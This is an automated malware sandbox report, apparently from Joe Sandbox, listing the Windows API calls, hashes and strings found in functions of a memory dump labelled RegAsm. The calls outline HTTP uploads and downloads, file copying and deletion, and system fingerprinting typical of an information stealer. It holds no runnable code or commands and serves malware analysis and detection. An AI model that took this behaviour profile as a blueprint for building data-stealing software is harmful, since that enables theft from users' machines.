Opcode Fuzzy Hash: 35f27fa272589be9e4fb75abc68f573cec913dc016191595aadbbc2473d1eb49
Instruction Fuzzy Hash: AC5157395E620DEFEB006BE09D1EBE83666AB17706F151015B30E9C0F0CA7444C59F36

Function 00404E03 Relevance: 33.7, APIs: 22, Instructions: 713
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
Part of subcall function 0040430F: lstrlen.KERNEL32(00000000), ref: 004043B9
Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000), ref: 004043C9

lstrlen.KERNEL32(00000000), ref: 00404E8B
StrCmpCA.SHLWAPI(?), ref: 00404EEF
InternetOpenA.WININET(00000000), ref: 00404F17
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405025
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00405082
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004050BA
lstrlen.KERNEL32(00000000), ref: 00405579
lstrlen.KERNEL32(00000000), ref: 0040558D
GetProcessHeap.KERNEL32(00000000,?), ref: 0040559D
RtlAllocateHeap.NTDLL(00000000), ref: 004055A4
lstrlen.KERNEL32(00000000), ref: 004055B9
lstrlen.KERNEL32(00000000), ref: 004055E6
lstrlen.KERNEL32(00000000), ref: 00405604
lstrlen.KERNEL32(00000000), ref: 0040561D
lstrlen.KERNEL32(00000000), ref: 00405647
HttpSendRequestA.WININET(00000000,00000000), ref: 0040565A
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040568D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405730
StrCmpCA.SHLWAPI(00000000), ref: 004057A1
ExitProcess.KERNEL32 ref: 004057AD
InternetCloseHandle.WININET(00000000), ref: 00405824

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: lstrlen$Internet$Http$HeapOpenProcessRequest$AllocateCloseConnectCrackExitFileHandleInfoOptionQueryReadSend
String ID:
API String ID: 60086702-0
Opcode ID: e8d077d1232f08207a24fb2be1d87668c100999456e531fa89c910a9d82c47f8
Instruction ID: 347b2e4d89f66f0c0c6539a9aa54472735362a414d5b47530b2be4bc622c77f0
Opcode Fuzzy Hash: e8d077d1232f08207a24fb2be1d87668c100999456e531fa89c910a9d82c47f8
Instruction Fuzzy Hash: 76520E729101189ADB14FBA1EC96FDE7379AF15305F5080AAF216B21F1DF386A88CF54

Function 004083A6 Relevance: 31.8, APIs: 21, Instructions: 265
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(00000000), ref: 00408450
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004084C9
RtlAllocateHeap.NTDLL(00000000), ref: 004084D0
lstrlen.KERNEL32(00000000), ref: 0040856A
lstrcat.KERNEL32(?), ref: 0040858F
lstrcat.KERNEL32(?,00000000), ref: 004085A1
lstrcat.KERNEL32(?,00428E50), ref: 004085AF
lstrcat.KERNEL32(?,00000000), ref: 004085C1
lstrcat.KERNEL32(?,00428E4C), ref: 004085CF
lstrcat.KERNEL32(?), ref: 004085DE
lstrcat.KERNEL32(?,00000000), ref: 004085F0
lstrcat.KERNEL32(?,00428E48), ref: 004085FE
lstrcat.KERNEL32(?), ref: 0040860D
lstrcat.KERNEL32(?,00000000), ref: 0040861F
lstrcat.KERNEL32(?,00428E48), ref: 0040862D
lstrcat.KERNEL32(?), ref: 0040863C
lstrcat.KERNEL32(?,00000000), ref: 0040864E
lstrcat.KERNEL32(?,00428E48), ref: 0040865C
lstrcat.KERNEL32(?,00428E48), ref: 0040866A
lstrlen.KERNEL32(?), ref: 00408688
DeleteFileA.KERNEL32(00000000), ref: 00408701

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: lstrcat$FileHeaplstrlen$AllocateCopyDeleteProcess
String ID:
API String ID: 1526373466-0
Opcode ID: 298c7eda3763950acb383d5e1acc27833362a263677850f14844f6025ad258df
Instruction ID: 4868cb4a0c5d8df9b0255056c1bbdf5f8baa826a61240bfbc382e0845978a72e
Opcode Fuzzy Hash: 298c7eda3763950acb383d5e1acc27833362a263677850f14844f6025ad258df
Instruction Fuzzy Hash: 00A11972900108AFDF05EBA1ED5AAED7B79FF15305F60502AF112B10B1EF3A5A44CB69

Function 00408741 Relevance: 30.5, APIs: 20, Instructions: 471
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileA.KERNEL32(00000000), ref: 00408885
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408A97
RtlAllocateHeap.NTDLL(00000000), ref: 00408A9E
lstrcat.KERNEL32(?,00000000), ref: 00408BCD
lstrcat.KERNEL32(?,00428E54), ref: 00408BDB
lstrcat.KERNEL32(?,00000000), ref: 00408BED
lstrcat.KERNEL32(?,00428E54), ref: 00408BFB
lstrcat.KERNEL32(?,00000000), ref: 00408C0D
lstrcat.KERNEL32(?,00428E54), ref: 00408C1B
lstrcat.KERNEL32(?,00000000), ref: 00408C2D
lstrcat.KERNEL32(?,00428E54), ref: 00408C3B
lstrcat.KERNEL32(?,00000000), ref: 00408C4D
lstrcat.KERNEL32(?,00428E54), ref: 00408C5B
lstrcat.KERNEL32(?,00000000), ref: 00408C6D
lstrcat.KERNEL32(?,00428E54), ref: 00408C7B
lstrcat.KERNEL32(?,00000000), ref: 00408CBD
lstrcat.KERNEL32(?,00428E48), ref: 00408CD6
lstrlen.KERNEL32(?), ref: 00408D14
lstrlen.KERNEL32(?), ref: 00408D22
DeleteFileA.KERNEL32(00000000), ref: 00408D92

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: lstrcat$FileHeaplstrlen$AllocateCopyDeleteProcess
String ID:
API String ID: 1526373466-0
Opcode ID: 9c5377450644b808aa49ef2139d9c0bddeeb9ac7e6beb8bc9d771ffa7162ac3e
Instruction ID: 75b67620860664da6d1f04eed94d7d10b36c4f27a8908ca0f5e9c5d632b00ffa
Opcode Fuzzy Hash: 9c5377450644b808aa49ef2139d9c0bddeeb9ac7e6beb8bc9d771ffa7162ac3e
Instruction Fuzzy Hash: 02021D71900109AADB05FBA1ED56EEE7779EF11309F50406AF216B10F1EF395A88CB68

Function 004058C4 Relevance: 27.6, APIs: 18, Instructions: 565
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
Part of subcall function 0040430F: lstrlen.KERNEL32(00000000), ref: 004043B9
Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000), ref: 004043C9

InternetOpenA.WININET(00000000), ref: 0040595F
StrCmpCA.SHLWAPI(?), ref: 00405975
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AEF
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00405B4C
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00405B84
lstrlen.KERNEL32(00000000), ref: 00405F2B
lstrlen.KERNEL32(00000000), ref: 00405F3C
GetProcessHeap.KERNEL32(00000000,?), ref: 00405F4C
RtlAllocateHeap.NTDLL(00000000), ref: 00405F53
lstrlen.KERNEL32(00000000), ref: 00405F68
lstrlen.KERNEL32(00000000), ref: 00405F8F
lstrlen.KERNEL32(00000000), ref: 00405FA8
lstrlen.KERNEL32(00000000), ref: 00405FCF
HttpSendRequestA.WININET(00000000,00000000), ref: 00405FE2
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405FFE
InternetCloseHandle.WININET(00000000), ref: 00406061
InternetCloseHandle.WININET(00000000), ref: 0040606D
InternetCloseHandle.WININET(00000000), ref: 00406076

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Internet$lstrlen$CloseHandle$HeapHttpOpenRequest$AllocateConnectCrackFileOptionProcessReadSend
String ID:
API String ID: 3504798179-0
Opcode ID: a66ab83ee9a4be09ba1fc520950cf087dddb51dd781f5e31811da84a80751809
Instruction ID: c3a436f612394fb5ea9af5c3dff246c6ebafd40c3fbf54516d0a2530dbd512cc
Opcode Fuzzy Hash: a66ab83ee9a4be09ba1fc520950cf087dddb51dd781f5e31811da84a80751809
Instruction Fuzzy Hash: 0632EB71920118AADB15FBA1DC96FDEB379BF14305F5001AAF216B21B1DF386B88CE54

Function 00404AD5 Relevance: 19.7, APIs: 13, Instructions: 197
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
Part of subcall function 0040430F: lstrlen.KERNEL32(00000000), ref: 004043B9
Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000), ref: 004043C9

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404B22
RtlAllocateHeap.NTDLL(00000000), ref: 00404B29
InternetOpenA.WININET(00000000), ref: 00404B54
StrCmpCA.SHLWAPI(?), ref: 00404B6D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BA1
HttpOpenRequestA.WININET(00000000,00428D80,?,00000000,00000000,00400100,00000000), ref: 00404C00
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00404C38
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C49
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00404C74
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404D05
InternetCloseHandle.WININET(00000000), ref: 00404D9B
InternetCloseHandle.WININET(00000000), ref: 00404DA7
InternetCloseHandle.WININET(00000000), ref: 00404DC5

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrlen
String ID:
API String ID: 4290736191-0
Opcode ID: 9537a9d194c5a7ef0f6d2f6b4f590e0a6d440a729354fd0f0852f1cd6a2c5ce1
Instruction ID: d037288fe89579f4ab5843d1a5928f681561e61fb867290b5a494df79b11f7d7
Opcode Fuzzy Hash: 9537a9d194c5a7ef0f6d2f6b4f590e0a6d440a729354fd0f0852f1cd6a2c5ce1
Instruction Fuzzy Hash: 769115B4900228AFDF20DF50DC45BEEB7B5BB45306F1040EAE609B6291DB796AC4DF49

Function 00411948 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 116
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
RtlAllocateHeap.NTDLL(00000000), ref: 00411A1F
wsprintfA.USER32 ref: 00411A54
lstrcat.KERNEL32(00000000,00429270), ref: 00411A65

Part of subcall function 00412667: GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674

lstrlen.KERNEL32(00000000), ref: 00411A7E
lstrcat.KERNEL32(00000000,00000000), ref: 00411AAC

Part of subcall function 00411668: lstrcpy.KERNEL32(?,00000000), ref: 004116A7

Strings

:, xrefs: 0041197E
\, xrefs: 00411982
C, xrefs: 0041196E

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Heaplstrcat$AllocateCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenwsprintf
String ID: :$C$\
API String ID: 2346809681-3809124531
Opcode ID: df1f1087f4c05290c9e1756edcf74e3756b2b8054fc343d78ff10ded4898d13c
Instruction ID: b4310f208fa9535f9906633d23b413fd942b8933ce9b069d1c57af1ba558f1c2
Opcode Fuzzy Hash: df1f1087f4c05290c9e1756edcf74e3756b2b8054fc343d78ff10ded4898d13c
Instruction Fuzzy Hash: EC417E71D0024CAFDF10EBA0DD59BED7BB8AF05305F10009AF219A61A1DB799BC4CB68

Function 004043FA Relevance: 18.5, APIs: 12, Instructions: 451
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
Part of subcall function 0040430F: lstrlen.KERNEL32(00000000), ref: 004043B9
Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000), ref: 004043C9

InternetOpenA.WININET(00000000), ref: 00404492
StrCmpCA.SHLWAPI(?), ref: 004044B2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040462C
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00400100,00000000), ref: 00404682
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004046BA
lstrlen.KERNEL32(00000000), ref: 0040497C
lstrlen.KERNEL32(00000000), ref: 00404998
HttpSendRequestA.WININET(00000000,00000000), ref: 004049AB
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004049D5
InternetCloseHandle.WININET(00000000), ref: 00404A38
InternetCloseHandle.WININET(00000000), ref: 00404A4F
InternetCloseHandle.WININET(00000000), ref: 00404A58

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Internet$CloseHandlelstrlen$HttpOpenRequest$ConnectCrackFileOptionReadSend
String ID:
API String ID: 3078421409-0
Opcode ID: c5050b3c8b222e83b80c0a8f51a3b8b6d1bd0b484176a1a4f7fe4222b9ea9d71
Instruction ID: 067cb1f7702ceabbac9578a1173a021fc80b9e748851ef74f8b32e742b117f95
Opcode Fuzzy Hash: c5050b3c8b222e83b80c0a8f51a3b8b6d1bd0b484176a1a4f7fe4222b9ea9d71
Instruction Fuzzy Hash: 22124E71900218AADB15EBA1DD92FDEB379BF15305F5000AAF216B21E1DF386B88CF54

Function 00418167 Relevance: 17.2, APIs: 11, Instructions: 749
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00411715: lstrlen.KERNEL32(?), ref: 0041171F
Part of subcall function 00411715: lstrcpy.KERNEL32(?,00000000), ref: 0041176D

Part of subcall function 00411668: lstrcpy.KERNEL32(?,00000000), ref: 004116A7

StrCmpCA.SHLWAPI(00000000,00428D8C,00000000), ref: 004182BD
StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00418321

Part of subcall function 0041177A: lstrcpy.KERNEL32(00000000,00418D35), ref: 004117D3

Part of subcall function 004116B4: lstrcpy.KERNEL32(?,00418CE8), ref: 004116F4

Part of subcall function 00417E48: StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00417E8B

Part of subcall function 00417F35: StrCmpCA.SHLWAPI(00000000,00428D8C,00000000), ref: 00417F96
Part of subcall function 00417F35: lstrlen.KERNEL32(00000000), ref: 00417FAD
Part of subcall function 00417F35: StrStrA.SHLWAPI(00000000,00000000), ref: 00417FDD
Part of subcall function 00417F35: lstrlen.KERNEL32(00000000), ref: 00417FF9
Part of subcall function 00417F35: lstrlen.KERNEL32(00000000), ref: 0041801F

StrCmpCA.SHLWAPI(00000000,00428D8C,00000000), ref: 0041840E
StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00418519
StrCmpCA.SHLWAPI(00000000,00428D8C,00000000), ref: 00418606
StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00418711
StrCmpCA.SHLWAPI(00000000,00428D8C,00000000), ref: 004187FE
StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00418909
StrCmpCA.SHLWAPI(00000000,00428D8C), ref: 00418B01

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 56199f80f6c449514464b6f83e613117e2b9bce5b72e5ca255660a64f945c111
Instruction ID: 2f695ca300a8a73312befe9c8800e9116e76318d555d5372ca32ba18f7f60556
Opcode Fuzzy Hash: 56199f80f6c449514464b6f83e613117e2b9bce5b72e5ca255660a64f945c111
Instruction Fuzzy Hash: 2D4232719001085ACB14FBF1ED5B9EE7378AF10305F90416FF516A61E2EF7C9A88CA99

Function 00406312 Relevance: 16.7, APIs: 11, Instructions: 184networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
Part of subcall function 0040430F: lstrlen.KERNEL32(00000000), ref: 004043B9
Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000), ref: 004043C9

InternetOpenA.WININET(00000000), ref: 00406373
StrCmpCA.SHLWAPI(?), ref: 00406390
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
HttpOpenRequestA.WININET(00000000,00428D80,?,00000000,00000000,00400100,00000000), ref: 0040640A
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040647E
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064F3
InternetCloseHandle.WININET(00000000), ref: 0040657C
InternetCloseHandle.WININET(00000000), ref: 00406585
InternetCloseHandle.WININET(00000000), ref: 0040658E

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenRequest$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID:
API String ID: 611152976-0
Opcode ID: ab6903b57e387325e96ca958ed3e5a2ae44ee289ff41f1a0725a10f3ba9a1484
Instruction ID: 51cd531d8c454c4eabdc451ce72ca3cccbe2bef7883915b0542a7032e80e54d3
Opcode Fuzzy Hash: ab6903b57e387325e96ca958ed3e5a2ae44ee289ff41f1a0725a10f3ba9a1484
Instruction Fuzzy Hash: 9E710871900218EFDF21EFA0DC45BDD7B75AB05305F6040AAF606BA1E0DBB96A94CF49

Function 0040613F Relevance: 13.6, APIs: 9, Instructions: 130networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
Part of subcall function 0040430F: lstrlen.KERNEL32(00000000), ref: 004043B9
Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000), ref: 004043C9

InternetOpenA.WININET(00000000), ref: 004061A8
StrCmpCA.SHLWAPI(?), ref: 004061E6
InternetOpenUrlA.WININET(00000000,00000000), ref: 00406229
CreateFileA.KERNEL32(00000000), ref: 0040624D
InternetReadFile.WININET(?,?,00000400,?), ref: 00406271
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040629D
CloseHandle.KERNEL32(?), ref: 004062DB
InternetCloseHandle.WININET(?), ref: 004062E4
InternetCloseHandle.WININET(00000000), ref: 004062F0

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrlen
String ID:
API String ID: 3596950596-0
Opcode ID: 65fc65a1cc92644710cac03ef35c900d0bde9ac874cabf2966d2f7132c99c5a8
Instruction ID: 322e9e665ac9740ae3a6c79426317fb00e7d6d1b0345a24b3972b26df0cd3c85
Opcode Fuzzy Hash: 65fc65a1cc92644710cac03ef35c900d0bde9ac874cabf2966d2f7132c99c5a8
Instruction Fuzzy Hash: BC515CB190021CABDF20EF60DC45BED7779FB01305F1050AAE616BA1E1DB786A99CF58

Function 0040430F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 70stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404373
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404387
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 0040439B
lstrlen.KERNEL32(00000000), ref: 004043B9
InternetCrackUrlA.WININET(00000000), ref: 004043C9

Strings

<, xrefs: 0040431A
<, xrefs: 0040435B

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID: <$<
API String ID: 1274457161-213342407
Opcode ID: 7f43b401d9b90e6af6df64014745be5d409e647001613bf356f6a9a7b6f8cc61
Instruction ID: 01f5d62e614e23a6b162f059a70a9e0953d43a02f97c16b9683ed6508c4b1ff7
Opcode Fuzzy Hash: 7f43b401d9b90e6af6df64014745be5d409e647001613bf356f6a9a7b6f8cc61
Instruction Fuzzy Hash: 48214771D00218AFDB10DFA9E881BCDBBB4BB04324F10815AE669F72A0DB345A85CF10

Function 0040F99F Relevance: 9.4, APIs: 6, Instructions: 360COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000), ref: 0040F9EF
StrCmpCA.SHLWAPI(00000000), ref: 0040FA75
StrCmpCA.SHLWAPI(00000000), ref: 0040FB84
StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD

Memory Dump Source

Source File: 00000018.00000002.2939946030.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_40e000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c17737c440b3a7247e5ac9883bd2c542befa3cd03075f26cbf3295bbc853d4
Instruction ID: 87d147e04e3a24980a39275aa9b0abb6dd5f2e96552c08bd51d602dc9e077d04
Opcode Fuzzy Hash: f4c17737c440b3a7247e5ac9883bd2c542befa3cd03075f26cbf3295bbc853d4
Instruction Fuzzy Hash: 18D16772A001099BCF24FBB5DD96FDD77B9BB50304F10402AE906EB1A1EE35DA48C795

Function 00407CDF Relevance: 9.1, APIs: 6, Instructions: 74filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000), ref: 00407D05
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
ReadFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00407D6E
LocalFree.KERNEL32(00000000), ref: 00407DA0
CloseHandle.KERNEL32(000000FF), ref: 00407DA9

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_401000_RegAsm.jbxd

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: f4d2365fb0571bee09006f2e97dc4132dad7baf00920a6d316aa4e540896ee5a
Instruction ID: 20c10e672a0f3402bfbef9d3d1be989891e350540804f4a5b6ad44830b3c41ef
Opcode Fuzzy Hash: f4d2365fb0571bee09006f2e97dc4132dad7baf00920a6d316aa4e540896ee5a
Instruction Fuzzy Hash: 6C31F174E00209EFDF11DFA4D849BEE7BB5BF0A301F104065E911AB2A0D778AA91CF55

Function 00412081 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0041208E
RtlAllocateHeap.NTDLL(00000000), ref: 00412095
GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004120B6
wsprintfA.USER32 ref: 004120FF

Strings

@, xrefs: 004120AB

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: @
API String ID: 2922868504-2766056989
Opcode ID: 79f72bc08b83e3ef02feff1fd7d79aed9ced9c3feebcb3628271b474f8aa2176
Instruction ID: da943534dc948d73dd967abc6d37c718adf03b454bdf056c0f5a7879574b1967
Opcode Fuzzy Hash: 79f72bc08b83e3ef02feff1fd7d79aed9ced9c3feebcb3628271b474f8aa2176
Instruction Fuzzy Hash: 71015EB0E40218BFEF00AFE0DC0ABADBBB9FB05749F104409F314B9090C7B866519B58

Function 00411ADD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411AF1
RtlAllocateHeap.NTDLL(00000000), ref: 00411AF8
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?), ref: 00411B29
RegQueryValueExA.KERNEL32(?,00000000,00000000,?,000000FF), ref: 00411B47

Strings

Windows 11, xrefs: 00411B0A

Memory Dump Source

Source File: 00000018.00000002.2939946030.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00411000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_411000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID: Windows 11
API String ID: 1425999871-2517555085
Opcode ID: 346f3f4664875a4ea084d75b8818ec132410f9d5b334d0546c756ba2ab9ffa29
Instruction ID: 3f27d459ef3b4295677ace20887899c1ffae7c715c4ca525cf07eb428eb26eef
Opcode Fuzzy Hash: 346f3f4664875a4ea084d75b8818ec132410f9d5b334d0546c756ba2ab9ffa29
Instruction Fuzzy Hash: 84013C34A44208FBEB10ABE0EC0AB9D7B7AFB06744F1050A5F701AA1A1E7749A94DB14

Function 1FE8FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1FE8FE03

Strings

winRead, xrefs: 1FE8FE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 1FE8FE78

Memory Dump Source

Source File: 00000018.00000002.2953499666.000000001FE88000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FE80000, based on PE: true

Associated: 00000018.00000002.2953459143.000000001FE80000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000001FE81000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000001FFE6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2953499666.000000002008D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955355624.000000002008F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955355624.0000000020098000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000018.00000002.2955652796.00000000200C2000.00000004.00001000.00020000.00000000.sdmpDownload File
